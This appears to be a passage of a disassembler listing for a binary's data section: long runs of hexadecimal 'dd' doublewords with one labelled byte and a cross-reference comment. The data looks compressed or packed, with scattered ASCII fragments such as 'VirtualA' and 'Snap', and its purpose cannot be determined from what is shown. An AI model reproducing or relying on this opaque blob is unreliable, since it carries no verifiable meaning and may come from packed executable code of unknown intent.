dd 0F5044789h, 0C80807F9h, 528512B4h, 98A7A9CBh, 1A3721C0h
dd 1047322Bh, 0BA10B110h, 0C7448E95h, 0D527A1A5h, 4582AA32h
dd 186E401Dh, 3C609436h, 48689757h, 76192BB5h, 15B8A05Bh
dd 9E9C980Eh, 0E9518E0Ch, 0C73E9193h, 0E05DCE35h, 1E142A2Eh
dd 46110B74h, 5BF86A6Eh, 9A04850Bh, 0B88C8B5Ah, 0CA532084h
dd 5B1F77B9h, 0DC24D771h, 1AE85589h, 4BD3C8Dh, 69AD7E17h
dd 72B43C9h, 0A4028DA0h, 0D49F1B10h, 0F5608501h, 0FEBB0300h
dd 0E0358605h, 0F9B86857h, 85731345h, 0B80ECC30h, 893E4816h
dd 0EC18DB59h, 62853913h, 0A441AFA2h, 0ACEA01A3h, 72696BE0h
dd 0FF646F7Fh, 4E5D0734h, 12C540BBh, 0CD9B82A0h, 97314A95h
dd 50271068h, 39CE84ECh, 0CDE98C4h, 0EE721183h, 7A3D8BA5h
dd 0A0B912FEh, 52C5A8DBh, 0AC017CC0h, 0DBFB7B1Bh, 18397517h
dd 0B37EBE5h, 0D01C8DE0h, 0F65C6C51h, 110319B0h, 0F2001BEh
dd 0B1DBFD7Bh, 1B06282Bh, 151ABD6Fh, 0B5FFCC38h, 99F9A3C4h
dd 0CCD04DCDh, 8C0E1863h, 0B0DDDBBh, 84EB711Eh, 0D31B30CBh
dd 9D90D868h, 75B8B9ECh, 4B4F9969h, 13261098h, 80535306h
dd 404C244Fh, 6A91EB4Eh, 1304B764h, 87EB5F47h, 8C6439Ch
dd 0DB86C20h, 0ABBAE88Ch, 6A4263C7h, 0D72F5D34h, 0C6C70C11h
dd 6359F460h, 0B2C87DAFh, 0B8500460h, 91223F0h, 8C1911ECh
dd 0EEC86154h, 8359C80Bh, 4D8351C7h, 60C07CC8h, 5778EBF1h
dd 45F1C28h, 5AF08EC6h, 0AC0B1B6Bh, 4C330E8Bh, 9899DAB7h
dd 213976D0h, 51A6C8B5h, 24CFB833h, 0A2893E89h, 4420FCBBh
dd 527DB884h, 84AF6425h, 477E97D6h, 0C208C683h, 5ECF72F0h
dd 0CC0400A7h, 5F78D81Dh, 0D574C4C7h, 0AE075328h, 0D1350CBFh
dd 280F474Ch, 666A9F11h, 138B67E8h, 25FF2C11h, 91054808h
dd 4C8C8E7h, 0F410F800h, 919AC16Ch, 0CCECF0h, 0EC27E819h
dd 0DCE08C8Ch, 0F33D5100h, 767D1BF6h, 7208F58Dh, 87E98114h
dd 162D662Dh, 85EC7F6Fh, 0EC731701h, 0C48BC82Bh, 8BE18B0Ch
dd 0B748C8F1h, 0C33140C1h, 8C88804Fh, 8CC8869Fh, 60B8E999h
dd 0C96F6029h, 3A1D77C9h, 88C813h, 0F4F7284Ah, 19930520h
dd 7E1680E1h, 0D03DCC39h, 271B34F7h, 6F5085A8h, 0DF1B4820h
dd 0D97972Eh, 2C32132Bh, 2A7410DCh, 4BCB3580h, 6C1C2F7Ch
dd 0CB203A27h, 142FD6E5h, 30585811h, 0AC765CDAh, 132B805Fh
dd 0E8112898h, 578C2089h, 9F7202A6h, 0E6B5BFE5h, 6D029709h
dd 70636D65h, 65739979h, 97FCB3B9h, 7302BE74h, 656C7274h
dd 0C302C56Eh, 6BCFDD3Bh, 1D616309h, 0D3A631BAh, 3F7FB76Ch
dd 5940333Fh, 2505841h, 0F0F5A40h, 0F837FD32h, 0F490E3Ah
dd 7865AACAh, 74706563h, 6EDD685Fh, 725243D1h, 43023DC1h
dd 0ADB3696Fh, 491BB2FDh, 7878435Fh, 48758546h, 0DEA3781Dh
dd 4513AF0Ah, 6C825F48h, 0BD42676Fh, 0D0310B41h, 7B545243h
dd 3DB67D9Ch, 14E4957h, 38F0C45h, 0B6418A6Ch, 7933DEE0h
dd 240BAA0Bh, 76A83743h, 0BDBFB542h, 54600D60h, 7474DEDBh
dd 6FD35265h, 0B7BA8105h, 37FFDB6h, 0E697257h, 73966250h
dd 721B4D73h, 0EED7FB9Bh, 470189C7h, 644113F6h, 11177264h
dd 0A5D82E67h, 6C75213Ah, 0D8095F4Fh, 356FFDAh, 74726956h
dd 416C6175h, 84452A84h, 751CC10Ah, 4C310261h, 0EA9BB535h
dd 695433FFh, 6F436B63h, 2074E75h, 86B60649h, 2BD5AEEDh
dd 2E64656Bh, 97670363h, 0C04AEB57h, 50754D41h, 930F6555h
dd 0A1364DEAh, 0DAD1452Fh, 5961FDFEh, 6C5F0388h, 0F500DB63h
dd 461D5302h, 0A56DBC80h, 0D6D6710h, 9E47014Fh, 8BDD70E0h
dd 0B8F6F25h, 0D5797021h, 0A66BF6B6h, 0F795323h, 1EBE44EBh
dd 0C5AE6ECh, 27316F1h, 4E32335Bh, 26B2BB6h, 497530D7h
dd 0E6C8718Ch, 6525CB68h, 0DF68AD06h, 6F70AA96h, 1870B0A3h
dd 70616E53h, 46DD6B61h, 0D51B6F28h, 1E627F43h, 82DB784Bh
dd 6D654144h, 0BB4645DBh, 4EA57C33h, 32915EAh, 37140B53h
dd 0EC16D8h, 6E1A2FDAh, 0F92FD230h, 0D5AACD86h, 0C85AC3ACh
dd 4CF2DAD6h, 11A04561h, 66F74685h, 76453B9Dh, 0F4A1FAEh
dd 0C2B46064h, 7F7AAEh, 49FB6544h, 671E886Fh, 4C76D6D5h
dd 1F31E500h, 80007965h, 2ED56137h, 5DC88702h, 13868D96h
dd 6592453Ch, 4466123h, 68D80160h, 426C2553h, 0F8D4CF75h
dd 4902A900h, 2DEB721Ch, 0AD6C735Bh, 430A7043h, 53C2694Ch
dd 7386C9BDh, 765F3D21h, 4B08C288h, 9F79D528h, 0F436BBF1h
dd 0FF501C68h, 45007D18h, 0F6532EDBh, 69694508h, 9F685C64h
dd 428DB76Ah, 146C2767h, 0CA267942h, 55D1CE6Eh, 6927284Fh
dd 330787Ah, 9B556309h, 6AB00F45h, 0F8DFE9h, 3C52454Bh
dd 5D0BC74Ch, 2D870A9h, 6682635Dh, 0C2187B71h, 0FC80258Ch
dd 0E9C371D6h, 65061789h, 64D07267h, 3B36ED25h, 0E3007Ch
dd 553F0CAFh, 76B65A53h, 1C5761E1h, 756AF900h, 0B06BB3EEh
dd 149C009Dh, 17D73B7h, 0ADC936C3h, 7075126Fh, 0A7759656h
dd 6901621Eh, 343D01A8h, 16F0528Bh, 0C620D48Eh, 0F8A9654Bh
dd 4336440Dh, 9A3034CCh
dd 0D6D8CC1Fh, 20EC3BDFh, 56444112h, 4B83496Fh, 25617942h
dd 27556F43h, 67856C11h, 47300F66h, 390F5475h, 0D6036B0Dh
dd 916F1F49h, 5160AE3Ch, 0FFCE0084h, 3F50DFD6h, 60335C33h
dd 3A336C33h, 3380337Ch, 0FF90338Ch, 33FF06FFh, 33B933AFh
dd 1BEB33C4h, 22340934h, 53343134h, 79345A34h, 0FF348434h
dd 0A8FFFFFFh, 0CC34BB34h, 634F634h, 31352B35h, 4E353B35h
dd 7D355D35h, 8E358835h, 9D359335h, 0FF35A735h, 0B4FFFFFFh
dd 0EA35D335h, 1035F535h, 40363536h, 5B364836h, 66366136h
dd 90367736h, 0AB369736h, 0FF36B236h, 0C2FFFFFFh, 0E636D136h
dd 18370436h, 2A372337h, 53373937h, 6F376837h, 0F237C237h
dd 6937F937h, 5638B738h, 0CCFFFFFFh, 0EB38DE38h, 2938FF38h
dd 5C395039h, 94398039h, 0A5399A39h, 0A539B839h, 0FFFFFFFFh
dd 39CB39C5h, 39D839D2h, 39E539E0h, 3A0D39F8h, 3A4F3A48h
dd 3A923A84h, 3AE43AA5h, 0FF3F3AEDh, 3BF16FFFh, 0E273C12h
dd 3F3C383Ch, 0A33C5E3Ch, 0BE3CB13Ch, 43CF23Ch, 0FF3DC73Dh
dd 0E5FFFFFFh, 133DF53Dh, 343E183Eh, 793E3A3Eh, 983E7F3Eh
dd 503EE93Eh, 643F573Fh, 7B3F6B3Fh, 3F3F863Fh, 98FFC34Ah
dd 0D13FCB3Fh, 0F13FEC3Fh, 73200F3Fh, 0FFFE302Ah, 31B0FFFFh
dd 330A31B5h, 332A3320h, 33B03337h, 355333B5h, 36153566h
dd 3633362Ch, 3657364Ah, 0FFFFFFDCh, 36ECC3EFh, 37B43758h
dd 37F437C8h, 383637FAh, 38473840h, 38873859h, 38A03899h
dd 0BFFF38A6h, 38ACFFFBh, 38B838B2h, 38C438BEh, 0D1D838D2h
dd 39283922h, 393D392Eh, 39683951h, 40043984h, 3990E358h
dd 9200F0ACh, 0FF8A1281h, 0FF65F7D0h, 0D00F75ABh, 0BE6E3149h
dd 1ABF031Ah, 37DD0715h, 4D687CDFh, 37361AADh, 3F1AB44Dh
dd 1AB868F6h, 4F522730h, 69E71464h, 5076863h, 0B535F700h
dd 727CE4B9h, 31400140h, 2EB079Fh, 97139ABEh, 0D2C31A0h
dd 0E9D8C80Bh, 403F601h, 7BC51927h, 0CA3BA0F2h, 0DB0725FEh
dd 7C538A31h, 34603A30h, 0CEC2689Fh, 0E00492BDh, 304F2338h
dd 0BC28A703h, 831CC840h, 2A7676A9h, 295407A3h, 0A207602Bh
dd 7628C2Dh, 642B3B92h, 7461525Eh, 80FBE761h, 46435307h
dd 0D8C80731h, 58DD65B2h, 2307AF54h, 0B34F072Ch, 0E21D0A8Dh
dd 0D19F2Eh, 98A323EBh, 780F37Dh, 60E13B57h, 2B27F14h
dd 0ED07C003h, 7F314651h, 0EB0332E2h, 0ACB36CEh, 32F61833h
dd 0AA0BC013h, 9A69A603h, 60DE94A6h, 0B2C8384Ah, 10FA9AEBh
dd 7A8B267Fh, 34D34433h, 3BC6375Dh, 7E9603B2h, 34D3656Ah
dd 2E3E5E4Dh, 9A31FE16h, 0E69A69A6h, 8CA6B8D0h, 9630E374h
dd 93315C6Dh, 0DF27025Bh, 4AA40414h, 83535126h, 722EFFC9h
dd 0C1F954BFh, 20BB5051h, 0EAB75F20h, 0C5FC821Fh, 7D8B2856h
dd 88B9C5FCh, 778297D4h, 0F3C0332Eh, 358B5DABh, 0B73D0328h
dd 88A06E89h, 0E88845E4h, 6C8C1405h, 0E08EE93h, 0D8D41DE4h
dd 872321C8h, 78DCD4D8h, 0E0C87632h, 5DC0EE0h, 0EF92E4ECh
dd 0AD6E123h, 0B9FFF4FCh, 0C0839EC1h, 0AC04133Ch, 33FC4EA6h
dd 0B78239F6h, 0F875F772h, 68144875h, 382205FCh, 0CCD6646Ah
dd 0C4C83DF7h, 13221B22h, 333BEF18h, 1C1634D9h, 0FF147414h
dd 500F3870h, 1682BAFBh, 1009FC8Bh, 0A214EAh, 0E0CCBE7Ch
dd 0E14BF8D8h, 0CC86192Eh, 0F105F7Dh, 1CA8EB7h, 70AC763Fh
dd 8D282A21h, 3B07F1BEh, 0C81274C7h, 8BFFEEF6h, 88B0450h
dd 890A8950h, 441B0451h, 1DE8EB5Eh, 3D8FB7D4h, 588D3F72h
dd 3D831FC4h, 4192C60h, 5B6F4175h, 4E8D0CF1h, 0B02BA3Ch
dd 0CD404688h, 0A1DB0FD8h, 0C91AD24Ch, 1D40568Ah, 23D9EBA0h
dd 4ABBB640h, 0EE76FFDCh, 0B67E10E1h, 8D2E3407h, 354F4786h
dd 528FB10Ch, 0DC560114h, 141AFF03h, 0D10E87A9h, 85F88B2Eh
dd 55B41FFFh, 8A973F3h, 186783h, 11C47C7h, 73750DE1h, 6240600h
dd 8D0E460Dh, 4F8FB28Eh, 4789FBC7h, 9E258A20h, 0F7768688h
dd 1A67F6B7h, 8904438Bh, 38041F1Fh, 8A047B89h, 0DB361896h
dd 0AC97B367h, 0D0157505h, 8E760040h, 47585EECh, 0C4B6FF4Dh
dd 7607EB0Bh, 1B1C3658h, 8550A536h, 0E1803D07h, 9B3C2F34h
dd 636951CDh, 7194F8Bh, 66C60189h, 4889DEC9h, 0C260735Ah
dd 6E7B645Eh, 0B2ABC7C0h, 0B008B6C4h, 0CDDD3399h, 5AD0BD02h
dd 0B6579D83h, 0F21D8BB8h, 2B0AB84Dh, 2AC38011h, 2B5906FBh
dd 0D31EC01Bh, 0D0DF0BB9h, 8E5D8D30h, 247C83CCh, 0E10FD308h
dd 99012DFEh, 8B470Ch, 0A06B08A3h, 0B1B6C058h, 96CCC9C2h
dd 60170DD7h, 0BFB89A4Bh, 0EDB79BBh, 5E8B7FE0h, 0E3B8060h
dd 4B8B4475h, 0C2538BF8h, 0F0176D4Dh, 0C0BF0B7h, 0F981FF33h
dd 0F445D9E0h, 9BD2C410h, 4174F8EDh, 3974E40Dh, 52FB5D8Dh
dd 4DBB75FBh, 7751509Ah, 9643E50h, 4B0DBF51h, 0D2EA97E0h
dd 89D2322Fh, 4689187Eh, 768B301Ch, 8BC4C225h, 0D9F044C7h
dd 51CD16F0h, 4C6030FFh, 0EDCA7454h, 6B9F2D23h, 58F685F0h
dd 46C60CDBh, 0BF63DB64h, 6846DDFBh, 44B3B89h, 153C850Fh
dd 0F0DF983h, 0F41E3382h, 1A37DB37h, 0CC255D8h, 2210CA3Bh
dd 16F87D81h, 9F7FC1EAh, 46C70975h, 6673C618h, 0D85C23F6h
dd 8D1A8BE3h, 1C4E719Fh, 50C488Dh, 0F6DBE106h, 0D7408B20h
dd 892455CBh, 874AEC5Dh, 46BFB16Fh, 878D928Fh, 6F42BE4h
dd 0C6783189h, 7089C2C8h, 13CB9756h, 42005D8Bh, 430F585Bh
dd 0BAC6481Dh, 0CD20CD2Ch, 7746B746h, 0D52B6857h, 0F7B910F9h
dd 6185C1DBh, 3135170Bh, 0AC0C1DF4h, 8A0D0B2Ah, 3BE4B574h
dd 0B5A1286Eh, 4189DB80h, 49F0459Ch, 61704444h, 0E689E086h
dd 76704EA6h, 6F1B272h, 569BEC97h, 88609F2Ch, 0CB73C5F5h
dd 0EE437389h, 0C68762CDh, 26572278h, 8BE0861h, 0C5DF169Fh
dd 0BDDB6205h, 1CBB1424h, 0DE778BC8h, 9399CC3Eh, 0CF17DCDh
dd 10020C39h, 0B3E1D3B8h, 5751CEBh, 0A3030BE8h, 0E04AEB30h
dd 0D866CF6Ch, 0D12DD56h, 56CCC941h, 0AF492043h, 25163C6Bh
dd 5D410052h, 490D5203h, 732F9Ah, 57005F1Bh, 24C15B4Eh
dd 0D1102405h, 1BA2DC08h, 8D7A5070h, 538A305Eh, 0BBA14566h
dd 0AFC45h, 0F33BFA05h, 0B90BB5D9h, 121C0972h, 0EF20CF0h
dd 64F3E6CDh, 18E87EF4h, 8EEC1AEAh, 8B5EC6FFh, 0C084D7F8h
dd 45AB2175h, 0F82140Ch, 7E85927h, 23350332h, 363B236Ch
dd 418A564Ch, 3F6EA48h, 11BB5B91h, 3F0B02C2h, 0E4880C06h
dd 10E7C8F3h, 0D8140E1Ah, 1C0BC018h, 0F9F9F9E4h, 103E2079h
dd 28137C24h, 9A2C0CC8h, 85AE1C0Dh, 2847663h, 85CC3A5Dh
dd 0DDFD0A66h, 0D62C144Ah, 641BADEEh, 20038B1Eh, 0E68A17Ch
dd 0FE420789h, 4D8F9F4h, 89047808h, 0C606EB3Dh, 1B03E42h
dd 9142A75Bh, 0C77F2Eh, 5D8E832Fh, 18069C6Bh, 2259344Bh
dd 6BDED942h, 31C2C0Bh, 389F1863h, 0EB3A9BB4h, 0B58FDE02h
dd 0F709BE56h, 0DF58878Ch, 5CA24CCEh, 9BDBB60Ch, 4EB89331h
dd 7D834B58h, 0FF21610Ch, 83D2C190h, 9D753E78h, 1EEBCE2Eh
dd 7E1840C7h, 3A7B115h, 35201556h, 78E0D22Fh, 40592A5Eh
dd 78100218h, 527EF7CCh, 8A1850ABh, 0A06D6015h, 22F62EB2h
dd 5672854Ah, 0C68C5873h, 0A274EB53h, 0ECEB36B2h, 0DD1CC631h
dd 5E75DE56h, 0C86C0628h, 0CAA37DEh, 72582834h, 0E223C36Bh
dd 4E57F85Dh, 0B51183E0h, 728F68C0h, 2E79D2FCh, 0B7E9FBC5h
dd 7B548FE4h
dd 0B86005EBh, 64568D72h, 7F740C55h, 7F89BFDBh, 80F0EB36h
dd 3700647Eh, 8B53684Eh, 418B6051h, 52305A6Ah, 810CE91Bh
dd 708AFFBh, 0C0A90DAEh, 0D8CFA285h, 0B22C0375h, 66A5F4ADh
dd 18B81058h, 0B08428Bh, 3495C807h, 0A95B7348h, 0EC1830FCh
dd 1029EB1Eh, 7DCDD08Ah, 0AB5C0461h, 0BBD402E0h, 9774CFEh
dd 2CF8190Fh, 0E3533F5Fh, 480F2C41h, 0DB85D8FCh, 0DFFFFCAEh
dd 2955F1D5h, 8FA8110h, 75400100h, 0E718D47h, 0A5247B8Dh
dd 288BA566h, 15AD5B10h, 765C3007h, 0DE90542Bh, 638369F3h
dd 0DB3019C4h, 0CEB1DAEh, 0F612201Ah, 0DD6EDC1h, 66040966h
dd 20A11407h, 95DD0B29h, 36EBED9Eh, 0D618094Eh, 0AB66AB4Dh
dd 0F3352BDBh, 0F63E2A07h, 0D80B1F42h, 143056CEh, 93ED0C27h
dd 947CDB1Ah, 51140A11h, 0DC38BC52h, 0E0DBC3DDh, 10AF930Ch
dd 14708D3Dh, 8070296h, 67D9D333h, 87DE8D59h, 8B212A1Ch
dd 0B2055590h, 57B216Fh, 5850D771h, 0DB2022EBh, 0F06D03Fh
dd 528B921Bh, 0F1218330h, 7E164C50h, 37694CB8h, 4513C50h
dd 2325833Ch, 9980F852h, 23183A00h, 0ECACAF4Fh, 0F18BD33Ch
dd 9F1DCF0Bh, 3BB90510h, 0F09688F9h, 3B60A5FCh, 80C73294h
dd 0C4788D52h, 5F0E7D3Bh, 407CA2h, 478B4097h, 0E869FC3Ch
dd 8708499h, 0A8576CD3h, 0E7035A1Dh, 8FE31CFEh, 0D77241D8h
dd 0D72A528Ah, 8C3118EBh, 0F246170h, 770C3D20h, 2F09DF24h
dd 3FF4BE0Ch, 0E33748A7h, 4AF4BEEFh, 0F77D89CFh, 5B3ADCB8h
dd 0F8B6B6FBh, 0E7B40118h, 0E141F6FCh, 0FBBB9AD7h, 0F3A6B674h
dd 1BEDB376h, 9A3A1948h, 0E2447F83h, 3661D051h, 0D3C11663h
dd 0B2311644h, 0E552D195h, 28F60D8Bh, 0D3E3A2BAh, 76A71E56h
dd 2254AA60h, 61A374E0h, 0A9F97FFFh, 8B3A6253h, 118BC14Dh
dd 674D285h, 108BC28Bh, 0E083F6EBh, 7BAE16C6h, 0A853B4F4h
dd 2F8EEB0Ah, 4B2D58EEh, 20830CA6h, 7682801Ah, 0CF132974h
dd 845114A0h, 0C39005EAh, 4D425638h, 0EF143F96h, 0BF76BEFh
dd 0D08699FFh, 460A06BAh, 637C5060h, 8CBB07BCh, 0BAA83986h
dd 34F4B3D3h, 670C10E3h, 3CA22464h, 2321A792h, 313F077h
dd 0DC5BF86Ch, 0D6A5C7Bh, 755A03FFh, 4BA58B19h, 0A17C112Ch
dd 7744A750h, 0E519722Dh, 67B6FB5Bh, 2A4B0306h, 18591CEBh
dd 488B0A73h, 0F82376CFh, 731477CEh, 13EB4F05h, 2D08401Dh
dd 66B41AD0h, 0A9EB232Ch, 0D5EADC1Bh, 148B2C0Bh, 0F67B3602h
dd 0BA6739C1h, 108FC16Bh, 13DC1084h, 36DCD85Fh, 18A508B3h
dd 27F7620h, 2DF8207Dh, 14045F2Dh, 34F46583h, 76FFFE62h
dd 40DBBF0Dh, 184D6889h, 0C33DD950h, 731C7D39h, 1BE86097h
dd 452BC7EBh, 4BA2B11Ch, 21FD3AB0h, 73FF4043h, 67DF7C38h
dd 46EC9EC5h, 40538A24h, 80F89927h, 800A0D7Fh, 2BBA528Bh
dd 0B2C9F475h, 4C4F7815h, 0EC343BC2h, 36360580h, 66342640h
dd 7565D81Dh, 5EB35E24h, 41BA68EBh, 6846A16Bh, 0C137C985h
dd 51D855C0h, 79834FEEh, 0E1A949F1h, 25746152h, 89540849h
dd 0CB6359B2h, 14E2E7C5h, 0DA850B78h, 8014F80Fh, 781A1C60h
dd 2155364Ch, 2E0A5F6h, 0E182A5F3h, 1DA4F303h, 0F600D270h
dd 7C8D0442h, 73D1A10h, 34FC07DBh, 608318B3h, 8CE4D48h
dd 631B6944h, 83882517h, 8B1055CFh, 1FBBB925h, 73838DF0h
dd 89113C4Ah, 0D4054042h, 691B133Eh, 0C1A00B3Ch, 30872D08h
dd 2E93AFB6h, 77F424CEh, 9A23AEF4h, 83C1C099h, 4C08448Dh
dd 4306085Eh, 7526291Fh, 20D83670h, 0EFE8F2D9h, 3874ECE8h
dd 48E96C3Eh, 0A27E5148h, 6EE6DF1Ch, 535C73F4h, 44342E54h
dd 88DB482Ch, 8E44A955h, 2770BF20h, 0F73B156Dh, 710CD0B3h
dd 743A3C39h, 0CC375BA4h, 4160DFA6h, 0C34049D3h, 0D83A46B2h
dd 2358BC4h, 0C8AAD6h, 0D79EC342h, 8CD308BAh, 29D63406h
dd 3F4A376Bh, 0F09C2C64h, 0B805EB30h, 23201C16h, 1CE12CD0h
dd 716C8409h, 15348308h, 23889404h, 269C0CCFh, 2CF6CA57h
dd 57090234h, 533F0C31h, 0E95AC1C1h, 14EB1B75h, 0C0EC35DBh
dd 0BEACD98Bh, 0DA2B2075h, 1393A572h, 0A4D88357h, 0DA12F8FBh
dd 522C1054h, 61022B74h, 0CDB4D9F1h, 3C75B02Dh, 0B6596CB2h
dd 2303C6Dh, 0ED24282Ch, 8587B06Eh, 0E62C1074h, 0DC622D2Ch
dd 511A05AAh, 823AD083h, 0FD099D6Fh, 0FAC28BFh, 28024FB7h
dd 0FA469AF5h, 0E3DD728h, 0C64B6361h, 21BBF65Bh, 0A028399Dh
dd 15B7095Ah, 8134080Eh, 0D6E66311h, 21F1DE5h, 0B5CA830Ah
dd 0B58B9EEBh, 5960168Ah, 88E62015h, 11CCC43h, 6D803BE0h
dd 7189C06Fh, 459890Bh, 1378C918h, 0CA4F61D8h, 1B22C857h
dd 8B154870h, 5C137207h, 9436D8C4h, 2F03B04Bh, 1BDB6CB2h
dd 1842A72Dh, 5A20056Ah, 0EDADC47Eh, 8B34883Bh, 0C23B8104h
dd 23B35C7Eh, 0EE578DF4h, 0B740368h, 81E9BE53h, 3C1BE756h
dd 1539E440h, 3E88FFDh, 8B250F85h, 6A8E2237h, 6177A13Dh
dd 59A258h, 0B38B01A0h, 0DDECA8D4h, 58BEF8Dh, 0FEBDC89h
dd 6A604324h, 7ED0211Ch, 0BEDAB01Bh, 0BF313990h, 6A3766CEh
dd 16758A15h, 3BB9EC63h, 231DF033h, 7136EC6Eh, 354D738Bh
dd 77096418h, 0DE7B574Dh, 58B65968h, 544C3005h, 1B1830B4h
dd 0D6CB2E46h, 5C480C18h, 1950AE54h, 345979ECh, 541A125Ch
dd 0AFFE1DB7h, 90E80DBBh, 4059D8Ch, 0C7445389h, 0A31C4800h
dd 291A7D2Bh, 0BEC63B01h, 44DB0293h, 0C77018EAh, 53067B43h
dd 10B7631Eh, 0A48EBA22h, 96F5C03Eh, 4CC6063Bh, 840C3421h
dd 0B9A0E512h, 5D146130h, 0BB354884h, 3526D721h, 29E80E2Ah
dd 0F758C907h, 78A6B259h, 916B570Ah, 0B58A8468h, 0F7B1875h
dd 29DE006Eh, 1A6FD40Ah, 7A8D1B6Ah, 9F075910h, 1858E02Ch
dd 0BFF3E14Dh, 2E1D7C06h, 105109C9h, 0A050984Eh, 991A3700h
dd 323243B7h, 46326B86h, 4DCE0CFCh, 398CA64Dh, 665BA360h
dd 0B6320AB4h, 0AD70D6Dh, 4A31AA64h, 77597A08h, 0D1DED8FBh
dd 0E0CA664Ah, 324B14AAh, 42C08571h, 0C681181h, 5FA8939Ch
dd 605C47ABh, 14B98F0Ch, 0D3CB428Eh, 530084F2h, 843B1931h
dd 5CBB800Eh, 0EC278A60h, 90A46ECCh, 8D8066E2h, 670A4E5Ch
dd 0C46E4145h, 0FA008897h, 25300C88h, 38EC8191h, 2BC41D10h
dd 125725CCh, 0CD6807BFh, 3304B9AEh, 0E6C3BAFFh, 0D89680D9h
dd 0FC04DCDAh, 3B3E6C9Eh, 0CA0CC812h, 0D010CC0Eh, 0D9910B18h
dd 0D41AD27Ch, 9466F820h, 36DD028h, 2CE213E0h, 0D5D40FD2h
dd 0A2531740h, 0A0083056h, 0C228656Dh, 995D8D57h, 0A7365B61h
dd 0C80A1ED6h, 0B7580C81h, 0D011CB21h, 500C83Bh, 0F6C8B7Dh
dd 11D83B18h, 788C3DB6h, 3FEE2284h, 0ECBA1F6Fh, 2004B809h
dd 7F0C8DF8h, 0B419E7C1h, 48EEC42Dh, 44D521C4h, 77F4DC07h
dd 56EFACE8h, 53BF773Ah, 8D458189h, 0D106DC60h, 0F6E0B541h
dd 96DE8C00h, 4D5B17A0h, 7D318BE0h, 4581C128h, 0AFAC99A0h
dd 0F4BBB9A2h, 0BAB60DFFh, 8DC2FF50h, 32B87373h, 6A9A2E89h
dd 7A8DDF00h, 0B6E5B5F8h, 0DF86675h, 3040883h, 96FB02ECh
dd 6F4D68Eh, 114279Dh, 0F0B41BE9h, 0B2176E6Dh, 5E377B85h
dd 460014F0h, 0FF1E19B9h, 0FEEE150Ch, 0A093A00Ch, 3889CABBh
dd 0C651E35Fh, 7BD41C31h, 6C6AE279h, 73718B8Ch, 0FE00F4Dh
dd 2CD3591Bh, 63A239A3h, 0FBC321C3h, 130C1A1Eh, 282B5AD1h
dd 8C140D71h, 26734182h, 0BA438364h, 0E017750Eh, 8308A80Eh
dd 9C383597h, 904C0D5Bh
dd 9BD2F893h, 8128481Ah, 0C401147Bh, 0B80775FCh, 0A6D834ACh
dd 4637EB2Ah, 0A445B957h, 93C5278h, 5304C053h, 735A01BDh
dd 682F8740h, 68F14CD9h, 9BBDFDC4h, 3B1D6A5Fh, 0BE4C8BBFh
dd 8193A354h, 7F061479h, 1AE00A1h, 81208D6Dh, 7605DC38h
dd 6854D005h, 6001B1Bh, 3C725E2Ch, 2FA39DDDh, 29665D14h
dd 19112830h, 9C9B584Ah, 582106EAh, 640611BAh, 0E8187151h
dd 49700E0Eh, 2117F67h, 589B7F08h, 57EE085h, 284A7427h
dd 0B952211Dh, 7A8D4D10h, 687D49C8h, 468C0C76h, 39578414h
dd 2BAB7EA4h, 46895F18h, 7C1E8B10h, 150FC0E0h, 0FAC38156h
dd 0B95E551Dh, 721FF87h, 60C38356h, 9AB8ECEBh, 1995ED51h
dd 73D64B18h, 7E748253h, 57DACCD5h, 0A577E434h, 0E830B89h
dd 0AA437632h, 7F478D47h, 9036FF47h, 80CC0BECh, 891840F1h
dd 87838147h, 579E9707h, 60579E7Ch, 0AC5A2DBDh, 0B43E8750h
dd 98057D68h, 6B3CA390h, 81E0663Ch, 0C683F06Eh, 7579FF04h
dd 450C4993h, 2D3218BEh, 1EF65810h, 712CD890h, 4650BE9Ch
dd 0D0480D8Bh, 0DFFBFEEh, 0D08A147Dh, 0C83B09B8h, 7541588h
dd 0FF065574h, 0EF3E1A2Dh, 98BC459h, 0F375DF3Bh, 944D1314h
dd 5379D61Bh, 9E976F9Bh, 56F98C35h, 1E47754Ch, 103844F0h
dd 0E1584B54h, 57184503h, 0C3C4DE1Ah, 0FDD7CA06h, 25340125h
dd 9710F750h, 18161CEBh, 0D58C102Eh, 44928733h, 0B618D126h
dd 1483553Ah, 42F84008h, 0A92F05A1h, 0D0EAB1CAh, 9CAB70BFh
dd 507C7589h, 0E4E8DF2h, 58EE5589h, 0E6ED1B75h, 0A5A3D35h
dd 829505B8h, 0BA8083B0h, 9C518C49h, 1C107B9h, 860F5581h
dd 0A09B0597h, 4E8F0483h, 2A748EEAh, 607EC0E5h, 7480350Fh
dd 0CA061F1Ah, 0AA3162Ah, 2A895327h, 2654F7C0h, 0E177C928h
dd 9E4A7461h, 1274F446h, 58A9649Dh, 5847388Ch, 64B7E0F4h
dd 4F30F400h, 5598430Ch, 0D0278DCAh, 0BA1F7827h, 0BCA23DD7h
dd 3104CA1h, 0A9422A7Ah, 81E045C7h, 0DD08A840h, 8A5414B0h
dd 0DF8E76E5h, 0A33772D6h, 0B9D3FF2Dh, 2E0E6A1Fh, 8F3447B4h
dd 41D60A23h, 0A256C51Eh, 315921ADh, 57361087h, 1C6EB780h
dd 150F04BDh, 0D7374450h, 9517F3Ah, 0D0B0FA0Ch, 8A99A266h
dd 0D54C5304h, 9037BE87h, 0A46FC25Ah, 0C7B2FFD3h, 3AC10D10h
dd 521FEB34h, 0C1D95152h, 387D6A78h, 3056D951h
db 8, 0C9h
db 0Eh
byte_444E5F db 3 ; DATA XREF: .text:off_446A89�o
dd 345653BFh, 2251FA5h, 8CB000E0h, 0D41C27E7h, 80E53AA1h
dd 3C2D6DBFh, 0F0B31EAh, 0F3DC6887h, 71880C60h, 5F04D947h
dd 985A1039h, 8AE1A4Dh, 8123FCD0h, 590C86D7h, 26F011FCh
dd 420C9C87h, 0FCFCF8E4h, 2D812B3Bh, 0D28F5D3Ah, 0C61EE155h
dd 2C4B0C00h, 0C80CC9D8h, 8080C81h, 0E59193DDh, 80F1463h
dd 88E408F8h, 8BF8F253h, 0B38DF84Eh, 0E21D6803h, 855DB93h
dd 9BA68388h, 0F9A5E59h, 842D42Ah, 9E084A89h, 11AF1C01h
dd 2B651471h, 926F19B8h, 0C7F45E9h, 0D620D5C7h, 454CC803h
dd 10F2D2C2h, 38BAF3E0h, 1E770C7Eh, 9F210394h, 0CB113108h
dd 17212162h, 2156D48Ah, 39097EBEh, 0C9347C50h, 73C2D8F3h
dd 7F04DA2Dh, 1EBEC017h, 0E1449C48h, 0D90D74CEh, 897B7091h
dd 74C2E36Fh, 3B67B893h, 8740C20h, 77360F35h, 0EB8FECABh
dd 0A9658D8h, 0B299219Fh, 41431F07h, 810E4112h, 0FE0F5C25h
